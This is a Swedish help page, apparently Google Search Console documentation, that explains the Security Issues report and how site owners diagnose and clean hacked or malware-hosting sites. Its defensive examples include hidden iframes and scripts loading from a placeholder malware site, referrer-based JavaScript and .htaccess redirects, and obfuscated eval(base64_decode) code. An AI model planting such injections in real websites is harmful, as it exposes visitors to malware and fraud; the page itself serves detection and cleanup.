Rapporten Säkerhetsproblem

Om Google kommer fram till att din webbplats har blivit hackad eller att den kan vara skadlig för besökare eller besökarnas datorer visas detta i rapporten Säkerhetsproblem. Exempel på vad som ses som skadligt kan vara nätfiske eller att skadlig eller oönskad programvara installeras på användarens dator.

Om det finns säkerhetsproblem på en sida eller webbplats visas en varning för den i sökresultaten. Det kan också hända att en varningssida öppnas i webbläsaren när en användare försöker besöka den.

Öppna rapporten om säkerhetsproblem

 

Vad räknas som säkerhetsproblem?

Säkerhetsproblem kan delas in i följande kategorier:

  • Hackat innehåll: Med detta avses sådant som någon har kunnat ladda upp på webbplatsen utan ditt tillstånd på grund av säkerhetsbrister på webbplatsen. Google vill skydda sina användare och arbetar därför hårt för att hålla hackat innehåll borta från sökresultaten. Läs mer.
  • Skadlig och oönskad programvara: Med detta avses programvara som skrivits för att vara skadlig för enheter eller användare, som vilseleder användarna eller gör saker som användarna inte väntat sig eller påverkar användaren negativt. Läs mer.
  • Manipulativt innehåll: Med detta avses sådant som lurar användarna att göra något riskfyllt, som att avslöja känsliga uppgifter eller ladda ned programvara. Läs mer.

Finns det säkerhetsproblem på min webbplats?

Om det finns säkerhetsproblem på webbplatsen visas antalet problem högst upp i rapporten.

Om det inte finns några säkerhetsproblem på webbplatsen visas en grön bockmarkering och ett meddelande om detta.

Men jag har nyss köpt den här webbplatsen!

Om du nyligen har köpt en webbplats med säkerhetsproblem åtgärdar du problemen i rapporten och talar sedan om för oss när du begär omprövning att du nyligen har övertagit webbplatsen och att den numera följer Googles riktlinjer för webbansvariga.

Vilka sidor påverkas?

Om du utökar beskrivningen av ett problem visas en lista med exempel på webbadresser som påverkas. Listan behöver inte vara fullständig, utan det rör sig om just exempel på sidor som berörs av det aktuella problemet på webbplatsen. Ibland kanske det inte finns några exempel. Det betyder inte att inga sidor påverkas, bara att vi inte kunde generera exempel av någon anledning.

Vid sidan av den kortfattade beskrivningen ser du vilket datum som problemet först upptäcktes på webbplatsen. Det finns även en länk till mer information om problemet.

Åtgärda problemet

Så här åtgärdar du ett säkerhetsproblem på webbplatsen:

  1. Utöka problembeskrivningen i rapporten om säkerhetsproblem.
  2. Läs beskrivningen av problemet och följ länken Läs mer, som leder till en sida med mer information om problemet och vad du kan göra åt det. (Länkarna leder till beskrivningarna längre ned på den här sidan.)
  3. Felsök och åtgärda problemet med hjälp av exemplen på sidor som drabbats. Listan behöver inte vara fullständig, utan det rör sig om just exempel på sidor som berörs av detta problem på webbplatsen. Ibland kanske det inte finns några exempel. Det betyder inte att inga sidor påverkas, bara att vi inte kunde generera exempel av någon anledning.
  4. Åtgärda problemet på hela webbplatsen. Det går inte att få sidorna delvis återinförda i sökresultaten genom att åtgärda problemet på några av dem.
  5. Om rapporten visar på flera säkerhetsproblem på webbplatsen ska du åtgärda samtliga.
  6. Testa åtgärderna.
  7. När alla problem i rapporten har åtgärdats på alla sidor väljer du Begär granskning i rapporten om säkerhetsproblem. Beskriv hur du har åtgärdat problemen i begäran om omprövning. En bra begäran innehåller tre saker:
    • En beskrivning av exakt vilket problem med kvaliteten som fanns på webbplatsen.
    • En beskrivning av vilka steg du har vidtagit för att åtgärda problemet.
    • Dokumentation av resultatet.
  8. Granskningen vid en omprövning kan ta ett par veckor. Du får veta via e-post hur det går. När du skickar begäran får du en bekräftelse så att du vet att granskningen har påbörjats. Skicka inte om begäran innan du har fått ett slutgiltigt besked om den granskning som pågår.

Hur lång tid tar granskningen vid omprövning?

Upp till två veckor. Du får ett e-postmeddelande när vi har tagit emot din begäran så att du vet att den pågår. Du får också ett e-postmeddelande när granskningen är klar.

Skicka inte om begäran innan du har fått besked om alla granskningar som pågår. Om du begär omprövning innan ett problem har åtgärdats kan det leda till att den fortsatta hanteringen tar mer tid eller t.o.m. att du ses som skyldig till upprepade överträdelser.

Lista över säkerhetsproblem

Här följer en lista över möjliga säkerhetsproblem med information om hur du åtgärdar dem.

Bedrägliga sidor

Det finns innehåll på webbplatsen som lurar användarna att göra något riskfyllt, som att avslöja känsliga uppgifter eller ladda ned programvara. Med Google Säker webbsökning varnas användare som är på väg att besöka webbsidor där bedrägligt innehåll brukar förekomma.

Om något av följande gäller för en webbsida klassas innehållet som bedrägligt:

  • Den utger sig för att vara, eller imiterar, något som du har förtroende för – t.ex. din egen enhet eller en webbläsare, eller den riktiga webbplatsen.
  • Den försöker lura dig att göra något genom att spela på ditt förtroende för en annan part, t.ex. att dela ditt lösenord, ringa ett supportnummer eller ladda ned programvara.

Innehåll av det här slaget kallas även manipulativt innehållLäs mer om manipulativt innehåll eller se exempel på bedrägliga sidor.

Åtgärda problemet

1. Kontrollera problemet

Besök exempelsidorna och titta efter det bedrägliga innehållet. Du kan öppna webbplatsen som den ser ut både på mobiler och datorer med granskningsverktyget för webbadresser.

2. Åtgärda sidorna

Åtgärda alla sidor med manipulativt innehåll. Om du anser att en webbsida har klassificerats felaktigt i Säker webbsökning rapporterar du det här.

3. Begär granskning

När du är säker på att problemet har åtgärdats på webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Bedrägliga inbäddade resurser

Det finns bedrägliga annonser eller inbäddade resurser på webbplatsen som lurar användarna att göra något riskfyllt, som att avslöja känsliga uppgifter eller ladda ned oönskad programvara. Det bedrägliga innehållet kan komma från resurser som har bäddats in på sidan, t.ex. bilder, andra komponenter från tredje part eller annonser. Med Google Säker webbsökning varnas användare som är på väg att besöka webbsidor där bedrägligt innehåll brukar förekomma.

Ibland är innehåll av det här slaget synligt för den som besöker värdsidan. I andra fall visas inga annonser på värdsidan utan användaren leds till skadliga sidor via popup- eller popunder-annonser eller omdirigeringar av annat slag. Allt inbäddat innehåll av det här slaget innebär att värdsidan bryter mot policyn.

Innehåll av det här slaget kallas även manipulativt innehållLäs mer om manipulativt innehåll eller se exempel på bedrägliga inbäddade resurser.

Åtgärda problemet

1. Kontrollera problemet

Besök exempelsidorna och titta efter det bedrägliga innehållet. Kontrollera att inga annonser, bilder eller andra inbäddade resurser från tredje part på webbplatsens sidor är bedrägliga. Observera att annonsnätverken kan byta ut annonser som visas på webbplatsen. Därför kan du behöva uppdatera sidan några gånger innan eventuella manipulativa annonser visas. Vissa annonser kan se olika ut på mobila enheter och stationära datorer. Du kan öppna webbplatsen som den ser ut både på mobiler och datorer med granskningsverktyget för webbadresser.

2. Ta bort de bedrägliga annonserna eller resurserna

Granska resurser från tredje part som används på webbplatsen. Försäkra dig om att inga annonser, bilder eller andra inbäddade resurser från tredje part på webbplatsens sidor är bedrägliga. Åtgärda alla sidor med manipulativt innehåll

3. Begär granskning

När du är säker på att problemet har åtgärdats på webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Skadlig programvara
Webbplatsen har smittats av, eller värdlagrar, skadlig programvara från hackare. Med skadlig programvara avses programvara som har utformats för att skada datorn, en mobil enhet, programvaran som körs eller användaren.

1. Avgör om det här är något som du kan åtgärda själv

Att åtgärda problem med skadlig programvara på webbplatsen kräver kunskap om programkod och eventuellt även om hur webbservrar ska vara konfigurerade för webbplatsen. Om du känner att detta inte är något du vill ge dig på själv läser du om hur du kan få hjälp i artikeln om att sätta samman ett supportteam.

2. Ställ en diagnos och åtgärda problemet med skadlig programvara

Det finns många olika slags skadlig programvara. Försök diagnostisera vilket slags skadlig programvara du har drabbats av utifrån avsnitten nedan och vidta åtgärder. Observera att webbplatsen kan ha drabbats av skadlig programvara av flera slag, så var grundlig när du ställer diagnosen och rensar webbplatsen.

Typ av skadlig programvara: Serverkonfiguration

Beskrivning

En hackare har manipulerat webbplatsen så att besökare omdirigeras till hackarens webbplats med skadlig programvara. Troligen är det serverns konfigurationsfiler som har ändrats. Med serverns konfigurationsfiler kan webbplatsadministratören ange adressomdirigeringar för vissa sidor eller kataloger på en webbplats. På Apache-servrar är detta till exempel .htaccess- och httpd.conf-filen.

Åtgärda problemet

1. Kontrollera problemet

Besök några av de exempeladresser som visas i rapporten om säkerhetsproblem.

Undvik att visa angripna sidor på din webbplats direkt i en webbläsare.

Eftersom skadlig programvara ofta sprids genom att webbläsarens säkerhetsbrister utnyttjas kan datorn skadas om du öppnar en sida som har utsatts för skadlig programvara i webbläsaren. Dessutom kan hackare dölja skräpinnehåll med hjälp av cloaking-teknik för att webbplatsägarna inte ska upptäcka dem.

Här är två alternativa och säkrare sätt att granska innehåll på datorn:

  • Med granskningsverktyget för webbadresser ser du sidan som den visas för Google. Detta är användbart eftersom många hackare gör ändringar som enbart är synliga för Google. De kan t.ex. lägga till länkar från din webbplats till sin egen som endast renderas när hänvisningsadressen kommer från Google.
  • Med cURL eller Wget kan du skicka HTTP-begäranden (som att hämta en sida) från kommandoraden. Dessa gratisverktyg kan vara till hjälp när omdirigeringar ska diagnostiseras och de kan specificera hänvisningsadressen eller information om användaragenten. Det är vanligt att hackare försöker undvika upptäckt och välja bättre mål genom att endast attackera specifika användaragenter eller hänvisningsadresser. Med dessa verktyg kan du efterlikna ett mål. Testa att använda olika hänvisningsadresser (till exempel länkar från stora webbplatser eller olika sökmotorer) om din begäran inte framkallar spaminnehållet. Om du till exempel vill efterlikna en användare som följer en länk från en resultat på Google Sök till www.example.com/page.html på en Windows-dator kan du använda cURL så här:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Ett svar från en sida där serverkonfigurationen har hackats kan ha följande HTTP-huvud:

…
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. Rensa webbplatsen från skadlig kod i serverkonfigurationen

Logga in på servern via skal-/terminalåtkomst (webbplatsen kan vara offline om du vill) och granska serverns konfigurationsfiler. Det kan finnas flera hackade konfigurationsfiler på webbplatsen. Se efter om det finns oönskade direktiv i filerna, till exempel omdirigeringar, där hackaren kan konfigurera webbplatsen att omdirigera besökare till okända webbplatser med skadlig programvara. Till exempel kan det finnas en omdirigering i stil med följande i filen .htaccess:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

Dessutom:

  • Kontrollera hela filen för att se om hackaren har lagt till kod i slutet av filen där den enkelt kan missas.
  • Undersök eventuella cron-jobb som hackaren skapat och som är utformade för att kontinuerligt uppdatera .htaccess-filen. Cron-jobb kan listas på flera platser, bland annat /etc/crontab (även flera /etc/cron*-kataloger) och /var/spool/cron.
  • Läs guiden för hackade webbplatser, där du hittar ett komplett arbetsflöde för hur webbplatsen ska åtgärdas, inklusive hur du rensar den och hur du kan förhindra att den blir hackad på nytt.
Typ av skadlig programvara: SQL-injektion

Beskrivning

Troligen har en hackare tagit sig in i webbplatsens databas. Till exempel kan hackaren ha lagt in skadlig kod i alla poster i databastabellen på programmatisk väg. När en sida som hämtar information från databasen sedan läses in bäddas den skadliga koden in i sidans innehåll där den potentiellt kan göra skada.

Åtgärda problemet

1. Kontrollera problemet

Kör några frågor om de drabbade webbadresserna via kommandotolken och titta efter ord som iframe eller eval, som är typiska för ett SQL-angrepp, i svaret.

Undvik att visa angripna sidor på din webbplats direkt i en webbläsare.

Eftersom skadlig programvara ofta sprids genom att webbläsarens säkerhetsbrister utnyttjas kan datorn skadas om du öppnar en sida som har utsatts för skadlig programvara i webbläsaren. Dessutom kan hackare dölja skräpinnehåll med hjälp av cloaking-teknik för att webbplatsägarna inte ska upptäcka dem.

Här är två alternativa och säkrare sätt att granska innehåll på datorn:

  • Med granskningsverktyget för webbadresser ser du sidan som den visas för Google. Detta är användbart eftersom många hackare gör ändringar som enbart är synliga för Google. De kan t.ex. lägga till länkar från din webbplats till sin egen som endast renderas när hänvisningsadressen kommer från Google.
  • Med cURL eller Wget kan du skicka HTTP-begäranden (som att hämta en sida) från kommandoraden. Dessa gratisverktyg kan vara till hjälp när omdirigeringar ska diagnostiseras och de kan specificera hänvisningsadressen eller information om användaragenten. Det är vanligt att hackare försöker undvika upptäckt och välja bättre mål genom att endast attackera specifika användaragenter eller hänvisningsadresser. Med dessa verktyg kan du efterlikna ett mål. Testa att använda olika hänvisningsadresser (till exempel länkar från stora webbplatser eller olika sökmotorer) om din begäran inte framkallar spaminnehållet. Om du till exempel vill efterlikna en användare som följer en länk från en resultat på Google Sök till www.example.com/page.html på en Windows-dator kan du använda cURL så här:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Logga sedan in på databasservern eller granska databasen i ett verktyg som phpMyAdmin. Om du använde Wget eller cURL provar du att korrelera skadan du ser i webbadressens källkod via Wget eller cURL med de faktiska databasposterna. Om du till exempel ser att sidorna innehåller en skadlig iframe kan du skicka en SQL-sökfråga och söka efter iframe-kod. Exempel:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

Du kan även söka efter ovanlig aktivitet i databasens logg- och felfiler, till exempel oväntade SQL-kommandon som inte verkar normala för vanliga användare eller fel.

2. Rensa webbplatsen

När du är klar att rensa webbplatsen kan du antingen uppdatera alla angripna databasposter eller återställa den senaste säkerhetskopian av databasen.

Dessutom:

  • Läs guiden för hackade webbplatser, där du hittar ett komplett arbetsflöde för hur webbplatsen ska åtgärdas, inklusive hur du rensar den och hur du kan förhindra att den blir hackad på nytt.
Typ av skadlig programvara: Kodinjektion

Beskrivning

Skadlig kod har lagts in på sidor på webbplatsen. Det kan t.ex. vara en iframe länkad till en webbplats med skadlig programvara.

Åtgärda problemet

1. Kontrollera problemet

Besök webbadresser som står som drabbade i rapporten om säkerhetsproblem. Titta efter skadlig kod i HTML-koden som servern svarar med.

Undvik att visa angripna sidor på din webbplats direkt i en webbläsare.

Eftersom skadlig programvara ofta sprids genom att webbläsarens säkerhetsbrister utnyttjas kan datorn skadas om du öppnar en sida som har utsatts för skadlig programvara i webbläsaren. Dessutom kan hackare dölja skräpinnehåll med hjälp av cloaking-teknik för att webbplatsägarna inte ska upptäcka dem.

Här är två alternativa och säkrare sätt att granska innehåll på datorn:

  • Med granskningsverktyget för webbadresser ser du sidan som den visas för Google. Detta är användbart eftersom många hackare gör ändringar som enbart är synliga för Google. De kan t.ex. lägga till länkar från din webbplats till sin egen som endast renderas när hänvisningsadressen kommer från Google.
  • Med cURL eller Wget kan du skicka HTTP-begäranden (som att hämta en sida) från kommandoraden. Dessa gratisverktyg kan vara till hjälp när omdirigeringar ska diagnostiseras och de kan specificera hänvisningsadressen eller information om användaragenten. Det är vanligt att hackare försöker undvika upptäckt och välja bättre mål genom att endast attackera specifika användaragenter eller hänvisningsadresser. Med dessa verktyg kan du efterlikna ett mål. Testa att använda olika hänvisningsadresser (till exempel länkar från stora webbplatser eller olika sökmotorer) om din begäran inte framkallar spaminnehållet. Om du till exempel vill efterlikna en användare som följer en länk från en resultat på Google Sök till www.example.com/page.html på en Windows-dator kan du använda cURL så här:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Det här är några exempel på skadlig kod:

  • iframe som läser in en skadlig webbplats:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • JavaScript eller annat skriptspråk som anropar och kör skript från en skadlig webbplats:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Skript som omdirigerar webbläsaren till en skadlig webbplats:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • Skadlig kod som dolts så att den ska bli svårare att upptäcka:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Delade objektfiler som utformats för att slumpmässigt skriva skadlig kod till i övrigt ofarliga skript:
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Undersök all potentiellt skadlig kod som finns på webbplatsen. Det kan hjälpa att söka på ord som [iframe] för att hitta iframe-kod. Andra bra sökord är script, eval och unescape. Så här söker du till exempel efter iframe i alla filer på Unix-baserade system:

$grep -irn "iframe" ./ | less

2. Rensa webbplatsen

När du är klar att rensa webbplatsen kan du antingen ersätta de drabbade filerna med den senaste säkerhetskopian före angreppet eller ta bort den injicerade koden från alla sidor och alla relaterade skriptfunktioner eller filer. Om du ändrade serverns konfigurationsfiler kanske du måste starta om webbservern för att ändringarna ska träda i kraft.

Dessutom:

  • Läs guiden för hackade webbplatser, där du hittar ett komplett arbetsflöde för hur webbplatsen ska åtgärdas, inklusive hur du rensar den och hur du kan förhindra att den blir hackad på nytt.
Typ av skadlig programvara: Felmall

Beskrivning

Mallen som används för felmeddelanden, till exempel felet 404 Filen hittades inte, är konfigurerad för att sprida skadlig programvara. På så sätt kan hackare angripa webbadresser som inte ens finns på din webbplats.

Åtgärda problemet

1. Kontrollera problemet

Begär en sida som inte finns på webbplatsen, eller som ger ett fel av något annat slag, och undersök om svaret kommer från en annan webbplats eller innehåller skadlig kod av något slag.

Undvik att visa angripna sidor på din webbplats direkt i en webbläsare.

Eftersom skadlig programvara ofta sprids genom att webbläsarens säkerhetsbrister utnyttjas kan datorn skadas om du öppnar en sida som har utsatts för skadlig programvara i webbläsaren. Dessutom kan hackare dölja skräpinnehåll med hjälp av cloaking-teknik för att webbplatsägarna inte ska upptäcka dem.

Här är två alternativa och säkrare sätt att granska innehåll på datorn:

  • Med granskningsverktyget för webbadresser ser du sidan som den visas för Google. Detta är användbart eftersom många hackare gör ändringar som enbart är synliga för Google. De kan t.ex. lägga till länkar från din webbplats till sin egen som endast renderas när hänvisningsadressen kommer från Google.
  • Med cURL eller Wget kan du skicka HTTP-begäranden (som att hämta en sida) från kommandoraden. Dessa gratisverktyg kan vara till hjälp när omdirigeringar ska diagnostiseras och de kan specificera hänvisningsadressen eller information om användaragenten. Det är vanligt att hackare försöker undvika upptäckt och välja bättre mål genom att endast attackera specifika användaragenter eller hänvisningsadresser. Med dessa verktyg kan du efterlikna ett mål. Testa att använda olika hänvisningsadresser (till exempel länkar från stora webbplatser eller olika sökmotorer) om din begäran inte framkallar spaminnehållet. Om du till exempel vill efterlikna en användare som följer en länk från en resultat på Google Sök till www.example.com/page.html på en Windows-dator kan du använda cURL så här:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Rensa webbplatsen

Logga in på webbservern och sök i serverns konfigurationsfiler efter direktiv om felfiler. Felmallen för Apache-webbservrar kan till exempel deklareras i htaccess-filen. Det här är ett exempel på en post i .htaccess-filen som hämtar 404-felsidor från en skadlig webbplats:

ErrorDocument 404 http://<malware-site>/index.html 

När du är klar att rensa webbplatsen kan du antingen ersätta .htaccess-filen med en säkerhetskopia som du vet inte har angripits eller ta bort de oönskade ErrorDocument-direktiven från de nuvarande .htaccess-filerna. Se även till att du rensar bort de faktiska felfilerna om de finns på din webbplats. Starta sedan om webbservern så att alla ändringar träder i kraft.

Dessutom:

  • Läs guiden för hackade webbplatser, där du hittar ett komplett arbetsflöde för hur webbplatsen ska åtgärdas, inklusive hur du rensar den och hur du kan förhindra att den blir hackad på nytt.
Typ av skadlig programvara: Skadlig programvara på flera webbplatser

Beskrivning

Webbplatsen läser in innehåll från en webbplats som är känd för att ha skadligt innehåll. I Chrome anges detta med en mellansida med följande bild i webbläsaren:

cross-site malware warning

Åtgärda problemet​

  1. Kontrollera problemet genom att surfa till några av exempeladresserna i rapporten om säkerhetsproblem. Om det gäller ett problem med skadlig programvara på flera webbplatser bör du se bilden ovan.
  2. I varningen i webbläsaren står vilken domän som det tveksamma innehållet finns på. Ta bort alla hänvisningar till den webbplatsen.
  3. Om det visar sig att innehåll från en webbplats som det varnas för har lagts in på en sida på din webbplats utan att du visste om det är problemet mer allvarligt och din webbplats har troligen utsatts för intrång. I båda fallen rekommenderar Google att du följer återställningsanvisningarna för att placera webbplatsen i karantän, bedöma skadan och rensa webbplatsen i hjälpen för hackade webbplatser.
  4. När du har tagit bort allt manipulativt innehåll från webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.
  5. Om du använde innehåll från en seriös webbplats som sedan drabbats och fått en varningsflagga kanske du vill ta med innehållet igen när den drabbade webbplatsen har städats upp. Du kan övervaka den flaggade webbplatsens status på diagnostiksidan för webbplatsen på Google Säker webbsökning (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). Seriösa webbplatser brukar städas snabbt av sina ägare.
Andra typer av skadlig programvara

Det finns många fler typer av skadlig kod och skadlig programvara som kan drabba en webbplats. På webbplatsen Webbens grunder finns fler tips om hur du ställer diagnos och åtgärdar andra slags angrepp från hackare. Kom ihåg att begära granskning när du har återställt webbplatsen.

3. Begär granskning

När du är säker på att problemet har åtgärdats på webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Typ av angrepp: Kodinjektion

En hackare har gjort intrång på webbplatsen och injicerat skadlig kod på sidorna. Det kan till exempel röra sig om omdirigeringar till en skadlig webbplats eller att webbläsaren utnyttjas till att köra programvara för kryptovaluta medan sidan är öppen.

1. Avgör om det här är något som du kan åtgärda själv

Med hjälp av artikeln om hur du sätter samman ett supportteam kan du bilda dig en uppfattning om vad som krävs för att själv åtgärda detta eller hur du kan få hjälp om du känner att det överstiger din förmåga.

2. Kontrollera problemet

Undvik att visa angripna sidor på din webbplats direkt i en webbläsare.

Eftersom skadlig programvara ofta sprids genom att webbläsarens säkerhetsbrister utnyttjas kan datorn skadas om du öppnar en sida som har utsatts för skadlig programvara i webbläsaren. Dessutom kan hackare dölja skräpinnehåll med hjälp av cloaking-teknik för att webbplatsägarna inte ska upptäcka dem.

Här är två alternativa och säkrare sätt att granska innehåll på datorn:

  • Med granskningsverktyget för webbadresser ser du sidan som den visas för Google. Detta är användbart eftersom många hackare gör ändringar som enbart är synliga för Google. De kan t.ex. lägga till länkar från din webbplats till sin egen som endast renderas när hänvisningsadressen kommer från Google.
  • Med cURL eller Wget kan du skicka HTTP-begäranden (som att hämta en sida) från kommandoraden. Dessa gratisverktyg kan vara till hjälp när omdirigeringar ska diagnostiseras och de kan specificera hänvisningsadressen eller information om användaragenten. Det är vanligt att hackare försöker undvika upptäckt och välja bättre mål genom att endast attackera specifika användaragenter eller hänvisningsadresser. Med dessa verktyg kan du efterlikna ett mål. Testa att använda olika hänvisningsadresser (till exempel länkar från stora webbplatser eller olika sökmotorer) om din begäran inte framkallar spaminnehållet. Om du till exempel vill efterlikna en användare som följer en länk från en resultat på Google Sök till www.example.com/page.html på en Windows-dator kan du använda cURL så här:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Hackaren kan ha lagt in den skadliga koden direkt i webbplatsens HTML-filer (till exempel en JavaScript-omdirigering) eller i filer som genererar webbplatsens innehåll (till exempel PHP-filer).

Hämta en sida som drabbats enligt rapporten och undersök svaret. Hackare kan använda flera olika tekniker för att omdirigera besökare från din webbplats till deras. Det här är några:

  • Omdirigering:​
    • Omdirigering via HTTP-huvudet: Hackaren kan omdirigera besökarna genom att ändra i serverns konfigurationsfiler. Med serverns konfigurationsfiler kan webbplatsadministratören ange adressomdirigeringar för vissa sidor eller kataloger på en webbplats. På Apache-servrar är detta till exempel .htaccess- och httpd.conf-filen.
      …
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • Omdirigeringar med JavaScript:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • Skadlig JavaScript-kod som läses in från en annan webbplats:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Skadlig kod som dolts för att undvika upptäckt:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Sök efter misstänkt kod i svaren och på webbplatsen. Det kan t.ex. vara bra att söka efter termer som search, eval, base64_decode och unescape.

3. Rensa webbplatsen

När du är klar att rensa webbplatsen kan du antingen ersätta de drabbade filerna med den senaste säkerhetskopian före angreppet eller ta bort skräpinnehållet själv.

Dessutom:

  • Läs guiden för hackade webbplatser, där du hittar ett komplett arbetsflöde för hur webbplatsen ska åtgärdas, inklusive hur du rensar den och hur du kan förhindra att den blir hackad på nytt.

4. Begär granskning

När du är säker på att problemet har åtgärdats på webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Typ av angrepp: Innehållsinjektion

En hackare har lagt till spam i form av länkar eller text på din webbplats. Det som infogats kan vara spam i form av läkemedelstermer eller annat som inte har med webbplatsens innehåll att göra.

Hackare kan ofta ändra din webbplats på något av följande sätt:

  • Genom att få åtkomst till en osäker katalog på din server. Du kanske till exempel har lämnat en katalog med öppna behörigheter av misstag.
  • Genom att utnyttja en säkerhetsrisk i programvara som körs på webbplatsen, till exempel ett innehållshanteringssystem. Till exempel kanske du kör en äldre, osäker version av Drupal, Joomla! eller WordPress.
  • Genom att hacka pluginprogram från tredje part som du använder på din webbplats, till exempel räknefunktioner för antalet besökare.

1. Avgör om det här är något som du kan åtgärda själv

Med hjälp av artikeln om hur du sätter samman ett supportteam kan du bilda dig en uppfattning om vad som krävs för att själv åtgärda detta eller hur du kan få hjälp om du känner att det överstiger din förmåga.

2. Kontrollera problemet

Undvik att visa angripna sidor på din webbplats direkt i en webbläsare.

Eftersom skadlig programvara ofta sprids genom att webbläsarens säkerhetsbrister utnyttjas kan datorn skadas om du öppnar en sida som har utsatts för skadlig programvara i webbläsaren. Dessutom kan hackare dölja skräpinnehåll med hjälp av cloaking-teknik för att webbplatsägarna inte ska upptäcka dem.

Här är två alternativa och säkrare sätt att granska innehåll på datorn:

  • Med granskningsverktyget för webbadresser ser du sidan som den visas för Google. Detta är användbart eftersom många hackare gör ändringar som enbart är synliga för Google. De kan t.ex. lägga till länkar från din webbplats till sin egen som endast renderas när hänvisningsadressen kommer från Google.
  • Med cURL eller Wget kan du skicka HTTP-begäranden (som att hämta en sida) från kommandoraden. Dessa gratisverktyg kan vara till hjälp när omdirigeringar ska diagnostiseras och de kan specificera hänvisningsadressen eller information om användaragenten. Det är vanligt att hackare försöker undvika upptäckt och välja bättre mål genom att endast attackera specifika användaragenter eller hänvisningsadresser. Med dessa verktyg kan du efterlikna ett mål. Testa att använda olika hänvisningsadresser (till exempel länkar från stora webbplatser eller olika sökmotorer) om din begäran inte framkallar spaminnehållet. Om du till exempel vill efterlikna en användare som följer en länk från en resultat på Google Sök till www.example.com/page.html på en Windows-dator kan du använda cURL så här:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Hämta några sidor på webbplatsen och sök efter misstänkt innehåll eller länkar som inte du har lagt till. Till exempel kan du söka i svaren efter namn på läkemedel eller vanliga spamtermer som viagra eller ”tjäna pengar”.

3. Rensa webbplatsen

När du är klar att rensa webbplatsen kan du antingen ersätta de drabbade filerna med den senaste säkerhetskopian före angreppet eller ta bort all spam i form av text och länkar från varje sida för sig. Se till att du åtgärdar alla exempel på hackade sidor som visas i rapporten om säkerhetsproblem. Sök dessutom efter andra hackade sidor på webbplatsen genom att göra en sökning på Google med site: och genom att söka i källfilerna på webbplatsen.

Dessutom:

  • Läs guiden för hackade webbplatser, där du hittar ett komplett arbetsflöde för hur webbplatsen ska åtgärdas, inklusive hur du rensar den och hur du kan förhindra att den blir hackad på nytt.

4. Begär granskning

När du är säker på att problemet har åtgärdats på webbplatsen begär du en säkerhetsgranskning via rapporten om säkerhetsproblem. Granskningen kan ta allt från ett par dagar till ett par veckor.

Typ av angrepp: Webbadressinjektion

En hackare har skapat nya sidor på webbplatsen. De innehåller ofta spam i form av sökord eller länkar. Ibland innehåller dessa nya sidor kod som gör saker som du inte planerat, till exempel omdirigerar dina användare till andra webbplatser eller gör webbservern delaktig i en DoS-attack mot andra webbplatser.

1. Avgör om det här är något som du kan åtgärda själv

Med hjälp av artikeln om hur du sätter samman ett supportteam kan du bilda dig en uppfattning om vad som krävs för att själv åtgärda detta eller hur du kan få hjälp om du känner att det överstiger din förmåga.

2. Kontrollera problemet

Undvik att visa angripna sidor på din webbplats direkt i en webbläsare.

Eftersom skadlig programvara ofta sprids genom att webbläsarens säkerhetsbrister utnyttjas kan datorn skadas om du öppnar en sida som har utsatts för skadlig programvara i webbläsaren. Dessutom kan hackare dölja skräpinnehåll med hjälp av cloaking-teknik för att webbplatsägarna inte ska upptäcka dem.

Här är två alternativa och säkrare sätt att granska innehåll på datorn:

  • Med granskningsverktyget för webbadresser ser du sidan som den visas för Google. Detta är användbart eftersom många hackare gör ändringar som enbart är synliga för Google. De kan t.ex. lägga till länkar från din webbplats till sin egen som endast renderas när hänvisningsadressen kommer från Google.
